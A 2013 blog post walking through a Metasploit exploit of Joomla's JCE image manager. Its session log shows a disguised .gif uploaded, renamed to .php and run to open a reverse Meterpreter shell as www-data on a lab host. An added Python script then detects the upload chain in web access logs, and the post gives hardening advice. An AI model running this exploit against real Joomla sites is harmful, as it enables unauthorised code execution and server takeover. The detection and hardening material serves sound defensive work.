Wednesday, March 27, 2013

Joomla Component JCE File Upload Remote Code Execution Metasploit Module



________________________________________________________

msf > use exploit/unix/webapp/joomla_comjce_imgmanager 
msf exploit(joomla_comjce_imgmanager) > info

       Name: Joomla Component JCE File Upload Remote Code Execution
     Module: exploit/unix/webapp/joomla_comjce_imgmanager
    Version: 0
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Unknown
  Heyder Andrade

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       Joomla directory path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability in the JCE component for 
  Joomla!, which could allow an unauthenticated remote attacker to 
  upload arbitrary files, caused by the component's failure to 
  sufficiently sanitize user-supplied input. By sending a specially-crafted 
  HTTP request, a remote attacker could exploit this vulnerability to 
  upload a malicious PHP script, which could allow the attacker to 
  execute arbitrary PHP code on the vulnerable system. This module has 
  been tested successfully on JCE Editor 1.5.71 and Joomla 1.5.26.

References:
  http://www.securityfocus.com/bid/49338
  http://www.exploit-db.com/exploits/17734

msf exploit(joomla_comjce_imgmanager) > set RHOST 172.16.86.133
RHOST => 172.16.86.133
msf exploit(joomla_comjce_imgmanager) > exploit 

[*] Started reverse handler on 172.16.86.1:4444 
[*] Checking component version to 172.16.86.133:80
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to 172.16.86.133
[*] Meterpreter session 1 opened (172.16.86.1:4444 -> 172.16.86.133:60773) at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
pwd
/var/www/joomla/images/stories
^C
Terminate channel 0? [y/N]  y
meterpreter > quit
[*] Shutting down Meterpreter...

[*] 172.16.86.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(joomla_comjce_imgmanager) > 
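The session log above shows the whole attack chain from the defender's side: a POST to the JCE image manager uploads a harmless-looking .gif, a second request renames it to .php, the attacker requests /images/stories/<random>.php once, and the module deletes the file again. Because the webshell is removed, a later scan of images/stories will usually find nothing; the web server access log is the durable artifact. The following is an added detection example, not code from the original post or from the Metasploit module. It parses Apache/nginx "combined" log lines and flags any client that hit the com_jce/imgmanager endpoint and then successfully executed a PHP file under /images/. The exact request URI of the image manager (option=com_jce&task=plugin&plugin=imgmanager) and the sample log lines are assumptions constructed for the example; only the component name, the plugin name, the images/stories path and the cpizwa.php filename come from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# ASSUMPTION: request shape of the JCE image manager endpoint. The page only
# names the component (com_jce) and plugin (imgmanager), not the full URI.
JCE_IMGMANAGER_RE = re.compile(r'option=com_jce.*plugin=imgmanager', re.I)

# Any script file under the Joomla image directory is suspicious: the module
# lands its payload in images/stories/<random>.php, and nothing served from
# /images/ should ever be PHP.
IMAGES_PHP_RE = re.compile(r'^/images/[^?]*\.ph(p\d?|tml|ar)(\?|$)', re.I)


def parse(line):
    """Parse one combined-format log line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], TS_FMT)
    rec['status'] = int(rec['status'])
    return rec


def detect_jce_upload_chain(lines, window_seconds=300):
    """Return one finding per successful request to a PHP file under /images/.

    Confidence is 'high' when the same client POSTed to the JCE image manager
    within `window_seconds` before the request (upload + rename + execute),
    and 'medium' when a PHP file under /images/ was served with no such
    precursor in the log (e.g. the upload happened in a rotated log file).
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            by_ip[rec['ip']].append(rec)

    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        jce_posts = [r for r in recs
                     if r['method'] == 'POST' and JCE_IMGMANAGER_RE.search(r['uri'])]
        for r in recs:
            if r['status'] != 200 or not IMAGES_PHP_RE.match(r['uri']):
                continue
            prior = [j for j in jce_posts
                     if 0 <= (r['ts'] - j['ts']).total_seconds() <= window_seconds]
            findings.append({
                'ip': ip,
                'webshell': r['uri'].split('?')[0],
                'when': r['ts'].isoformat(),
                'jce_requests_before': len(prior),
                'confidence': 'high' if prior else 'medium',
            })
    return findings


# Constructed sample log: the first three lines mimic the session above
# (upload, rename, execute from 172.16.86.1); the rest is benign noise.
SAMPLE_LOG = """\
172.16.86.1 - - [27/Mar/2013:22:14:29 -0300] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 200 312 "-" "Mozilla/5.0"
172.16.86.1 - - [27/Mar/2013:22:14:30 -0300] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager HTTP/1.1" 200 87 "-" "Mozilla/5.0"
172.16.86.1 - - [27/Mar/2013:22:14:31 -0300] "GET /images/stories/cpizwa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Mar/2013:22:20:01 -0300] "GET /images/stories/logo.gif HTTP/1.1" 200 4121 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Mar/2013:22:21:00 -0300] "GET /images/stories/old.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in detect_jce_upload_chain(SAMPLE_LOG.splitlines()):
        print(f)
```

Run it against a real access log with `detect_jce_upload_chain(open('/var/log/apache2/access.log').read().splitlines())`. The 'medium' tier matters in practice: the module deletes cpizwa.php after the Meterpreter stage is fetched, so the 200 for a .php under /images/ may be the only trace left on disk-less evidence. The corresponding hardening is the obvious one the chain relies on not being there: do not let the PHP handler run on anything below the upload directory (a `php_flag engine off` or a deny rule for `\.ph(p\d?|tml|ar)$` scoped to /images/), so that an uploaded-and-renamed file is served as bytes rather than executed as www-data.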


___________________________________________________________
